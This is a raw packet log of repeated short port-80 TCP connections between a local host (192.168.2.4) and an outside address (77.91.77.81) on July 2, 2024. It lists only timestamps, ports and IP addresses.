Jul 2, 2024 00:28:14.912992001 CEST	80	49951	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:15.613807917 CEST	80	49951	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:15.613889933 CEST	49951	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:15.727663994 CEST	49951	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:15.728048086 CEST	49952	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:15.734968901 CEST	80	49951	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:15.735018969 CEST	49951	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:15.735451937 CEST	80	49952	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:15.735505104 CEST	49952	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:15.735690117 CEST	49952	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:15.742819071 CEST	80	49952	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:16.459882975 CEST	80	49952	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:16.459976912 CEST	49952	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:16.572325945 CEST	49952	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:16.579610109 CEST	80	49952	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:16.579677105 CEST	49952	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:16.620920897 CEST	49953	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:16.628021955 CEST	80	49953	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:16.628110886 CEST	49953	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:16.661252022 CEST	49953	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:16.667889118 CEST	80	49953	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:17.349988937 CEST	80	49953	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:17.350064993 CEST	49953	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:17.463283062 CEST	49953	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:17.463603020 CEST	49954	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:17.468261003 CEST	80	49953	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:17.468316078 CEST	49953	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:17.468375921 CEST	80	49954	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:17.468475103 CEST	49954	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:17.468811035 CEST	49954	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:17.473685026 CEST	80	49954	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:18.173485041 CEST	80	49954	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:18.173577070 CEST	49954	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:18.177023888 CEST	49954	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:18.177496910 CEST	49955	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:18.182468891 CEST	80	49954	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:18.182485104 CEST	80	49955	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:18.182523966 CEST	49954	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:18.182578087 CEST	49955	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:18.182811975 CEST	49955	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:18.187720060 CEST	80	49955	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:18.922401905 CEST	80	49955	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:18.922487974 CEST	49955	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:19.040822983 CEST	49955	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:19.041174889 CEST	49956	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:19.046056986 CEST	80	49956	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:19.046153069 CEST	49956	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:19.046375990 CEST	49956	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:19.046957016 CEST	80	49955	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:19.050368071 CEST	49955	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:19.051101923 CEST	80	49956	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:19.733016014 CEST	80	49956	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:19.733095884 CEST	49956	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:19.753998041 CEST	49956	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:19.754944086 CEST	49957	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:19.760867119 CEST	80	49956	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:19.760946035 CEST	49956	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:19.761815071 CEST	80	49957	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:19.761883020 CEST	49957	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:19.807977915 CEST	49957	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:19.814587116 CEST	80	49957	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:20.462461948 CEST	80	49957	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:20.462532997 CEST	49957	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:20.604604959 CEST	49957	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:20.604978085 CEST	49958	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:20.611016035 CEST	80	49957	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:20.611064911 CEST	49957	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:20.611826897 CEST	80	49958	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:20.611900091 CEST	49958	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:20.612370014 CEST	49958	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:20.618720055 CEST	80	49958	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:21.327033043 CEST	80	49958	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:21.331243992 CEST	49958	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:21.333692074 CEST	49958	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:21.334011078 CEST	49959	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:21.341464996 CEST	80	49958	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:21.341783047 CEST	80	49959	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:21.341798067 CEST	49958	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:21.341859102 CEST	49959	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:21.342187881 CEST	49959	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:21.350055933 CEST	80	49959	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:22.054239035 CEST	80	49959	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:22.054311991 CEST	49959	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:22.165268898 CEST	49959	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:22.165669918 CEST	49960	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:22.172063112 CEST	80	49960	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:22.172143936 CEST	49960	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:22.172183990 CEST	80	49959	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:22.172230959 CEST	49959	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:22.172419071 CEST	49960	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:22.179806948 CEST	80	49960	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:22.859287024 CEST	80	49960	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:22.859369040 CEST	49960	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:22.862531900 CEST	49960	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:22.862854958 CEST	49961	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:22.867579937 CEST	80	49960	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:22.867645979 CEST	49960	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:22.867851019 CEST	80	49961	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:22.867921114 CEST	49961	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:22.868175983 CEST	49961	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:22.872920990 CEST	80	49961	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:23.569871902 CEST	80	49961	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:23.569937944 CEST	49961	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:23.681626081 CEST	49961	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:23.681986094 CEST	49962	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:23.686820984 CEST	80	49961	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:23.686877012 CEST	49961	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:23.687166929 CEST	80	49962	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:23.687237024 CEST	49962	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:23.687443972 CEST	49962	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:23.692222118 CEST	80	49962	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:23.694269896 CEST	49962	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:23.698268890 CEST	49963	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:23.703071117 CEST	80	49963	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:23.703130960 CEST	49963	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:23.703387976 CEST	49963	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:23.708189011 CEST	80	49963	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:24.442823887 CEST	80	49963	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:24.442992926 CEST	49963	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:24.556034088 CEST	49964	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:24.556036949 CEST	49963	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:24.562249899 CEST	80	49964	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:24.562367916 CEST	49964	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:24.562557936 CEST	80	49963	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:24.562628031 CEST	49964	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:24.562717915 CEST	49963	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:24.568918943 CEST	80	49964	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:25.986188889 CEST	80	49964	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:25.986394882 CEST	80	49964	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:25.986473083 CEST	49964	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:25.986526012 CEST	80	49964	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:25.986994028 CEST	49964	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:26.172300100 CEST	49964	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:26.172858953 CEST	49965	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:26.177606106 CEST	80	49964	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:26.177650928 CEST	80	49965	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:26.177701950 CEST	49964	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:26.177741051 CEST	49965	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:26.180660009 CEST	49965	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:26.185472012 CEST	80	49965	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:26.891284943 CEST	80	49965	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:26.891346931 CEST	49965	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:27.009525061 CEST	49965	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:27.009875059 CEST	49966	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:27.016552925 CEST	80	49966	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:27.016627073 CEST	49966	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:27.016688108 CEST	80	49965	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:27.016777992 CEST	49965	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:27.016892910 CEST	49966	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:27.024367094 CEST	80	49966	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:27.713728905 CEST	80	49966	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:27.713814974 CEST	49966	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:27.717130899 CEST	49966	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:27.717468977 CEST	49967	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:27.722212076 CEST	80	49967	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:27.722270012 CEST	80	49966	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:27.722301006 CEST	49967	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:27.722320080 CEST	49966	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:27.722800970 CEST	49967	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:27.727526903 CEST	80	49967	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:28.487091064 CEST	80	49967	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:28.487224102 CEST	49967	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:28.603163004 CEST	49967	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:28.603507042 CEST	49968	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:28.608279943 CEST	80	49967	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:28.608333111 CEST	49967	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:28.608362913 CEST	80	49968	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:28.608588934 CEST	49968	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:28.608871937 CEST	49968	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:28.613655090 CEST	80	49968	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:29.314238071 CEST	80	49968	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:29.315709114 CEST	49968	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:29.389298916 CEST	49968	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:29.389719009 CEST	49969	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:29.394627094 CEST	80	49969	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:29.394670963 CEST	80	49968	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:29.394754887 CEST	49968	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:29.394787073 CEST	49969	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:29.403502941 CEST	49969	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:29.408410072 CEST	80	49969	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:30.191380978 CEST	80	49969	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:30.191764116 CEST	49969	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:30.306641102 CEST	49969	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:30.306958914 CEST	49970	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:30.311705112 CEST	80	49969	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:30.311764002 CEST	49969	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:30.312468052 CEST	80	49970	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:30.312669992 CEST	49970	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:30.312750101 CEST	49970	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:30.317787886 CEST	80	49970	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:31.000540018 CEST	80	49970	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:31.000893116 CEST	49970	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:31.004147053 CEST	49970	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:31.004184961 CEST	49971	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:31.010576963 CEST	80	49971	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:31.010791063 CEST	49971	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:31.010950089 CEST	80	49970	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:31.010981083 CEST	49971	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:31.011039972 CEST	49970	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:31.017179966 CEST	80	49971	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:31.710532904 CEST	80	49971	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:31.710706949 CEST	49971	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:31.822696924 CEST	49971	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:31.823241949 CEST	49972	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:31.827824116 CEST	80	49971	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:31.827871084 CEST	49971	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:31.827986956 CEST	80	49972	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:31.828075886 CEST	49972	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:31.828448057 CEST	49972	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:31.833323956 CEST	80	49972	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:32.516949892 CEST	80	49972	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:32.517039061 CEST	49972	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:32.520164013 CEST	49972	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:32.520539999 CEST	49973	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:32.525430918 CEST	80	49972	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:32.525449038 CEST	80	49973	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:32.525487900 CEST	49972	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:32.525522947 CEST	49973	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:32.525856972 CEST	49973	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:32.530724049 CEST	80	49973	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:33.236203909 CEST	80	49973	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:33.238810062 CEST	49973	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:33.352893114 CEST	49973	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:33.352893114 CEST	49974	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:33.359765053 CEST	80	49974	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:33.360235929 CEST	80	49973	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:33.360320091 CEST	49973	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:33.360320091 CEST	49974	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:33.360534906 CEST	49974	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:33.367358923 CEST	80	49974	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:34.045438051 CEST	80	49974	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:34.045492887 CEST	49974	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:34.048962116 CEST	49974	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:34.049352884 CEST	49975	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:34.055423021 CEST	80	49974	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:34.055469036 CEST	49974	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:34.055576086 CEST	80	49975	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:34.055643082 CEST	49975	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:34.056061983 CEST	49975	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:34.062154055 CEST	80	49975	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:34.765216112 CEST	80	49975	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:34.768528938 CEST	49975	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:34.927887917 CEST	49975	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:34.929568052 CEST	49976	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:34.933233023 CEST	80	49975	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:34.933712959 CEST	49975	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:34.934359074 CEST	80	49976	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:34.934583902 CEST	49976	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:34.954972982 CEST	49976	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:34.961750031 CEST	80	49976	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:35.625720024 CEST	80	49976	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:35.625852108 CEST	49976	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:35.628844023 CEST	49977	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:35.628896952 CEST	49976	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:35.634994030 CEST	80	49977	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:35.635123014 CEST	49977	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:35.635574102 CEST	80	49976	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:35.635673046 CEST	49977	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:35.635688066 CEST	49976	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:35.641568899 CEST	80	49977	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:36.394483089 CEST	80	49977	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:36.394539118 CEST	49977	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:36.510004044 CEST	49977	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:36.510431051 CEST	49978	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:36.515296936 CEST	80	49977	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:36.515311956 CEST	80	49978	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:36.515341997 CEST	49977	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:36.515410900 CEST	49978	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:36.515642881 CEST	49978	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:36.520451069 CEST	80	49978	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:36.522161961 CEST	49978	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:36.525393009 CEST	49979	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:36.530318022 CEST	80	49979	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:36.530391932 CEST	49979	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:36.530503035 CEST	49979	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:36.535260916 CEST	80	49979	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:37.236471891 CEST	80	49979	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:37.239116907 CEST	49979	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:37.353827953 CEST	49979	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:37.355058908 CEST	49980	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:37.360229969 CEST	80	49979	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:37.361407042 CEST	49979	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:37.361646891 CEST	80	49980	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:37.365468979 CEST	49980	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:37.370891094 CEST	49980	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:37.377127886 CEST	80	49980	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:38.827372074 CEST	80	49980	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:38.827430964 CEST	49980	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:38.827639103 CEST	80	49980	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:38.827675104 CEST	49980	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:38.827812910 CEST	80	49980	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:38.827886105 CEST	49980	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:38.833163977 CEST	49980	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:38.833640099 CEST	49981	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:39.020694971 CEST	80	49980	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:39.020757914 CEST	49980	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:39.021657944 CEST	80	49981	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:39.021720886 CEST	80	49980	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:39.021740913 CEST	49981	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:39.021781921 CEST	49980	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:39.095261097 CEST	49981	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:39.103080988 CEST	80	49981	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:39.738157988 CEST	80	49981	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:39.738238096 CEST	49981	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:39.852725029 CEST	49981	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:39.853080034 CEST	49982	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:39.857920885 CEST	80	49982	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:39.857939005 CEST	80	49981	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:39.858048916 CEST	49982	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:39.858048916 CEST	49981	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:39.858174086 CEST	49982	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:39.863276005 CEST	80	49982	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:40.563281059 CEST	80	49982	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:40.563419104 CEST	49982	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:40.566819906 CEST	49983	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:40.566850901 CEST	49982	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:40.571674109 CEST	80	49983	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:40.571789980 CEST	49983	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:40.572050095 CEST	49983	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:40.572529078 CEST	80	49982	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:40.574254990 CEST	49982	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:40.576792955 CEST	80	49983	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:41.270922899 CEST	80	49983	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:41.270978928 CEST	49983	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:41.411483049 CEST	49983	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:41.418509960 CEST	80	49983	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:41.418586969 CEST	49983	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:41.473869085 CEST	49984	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:41.481204033 CEST	80	49984	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:41.481280088 CEST	49984	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:41.501682043 CEST	49984	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:28:41.508272886 CEST	80	49984	77.91.77.81	192.168.2.4
Jul 2, 2024 00:28:42.179579020 CEST	80	49984	77.91.77.81	192.168.2.4
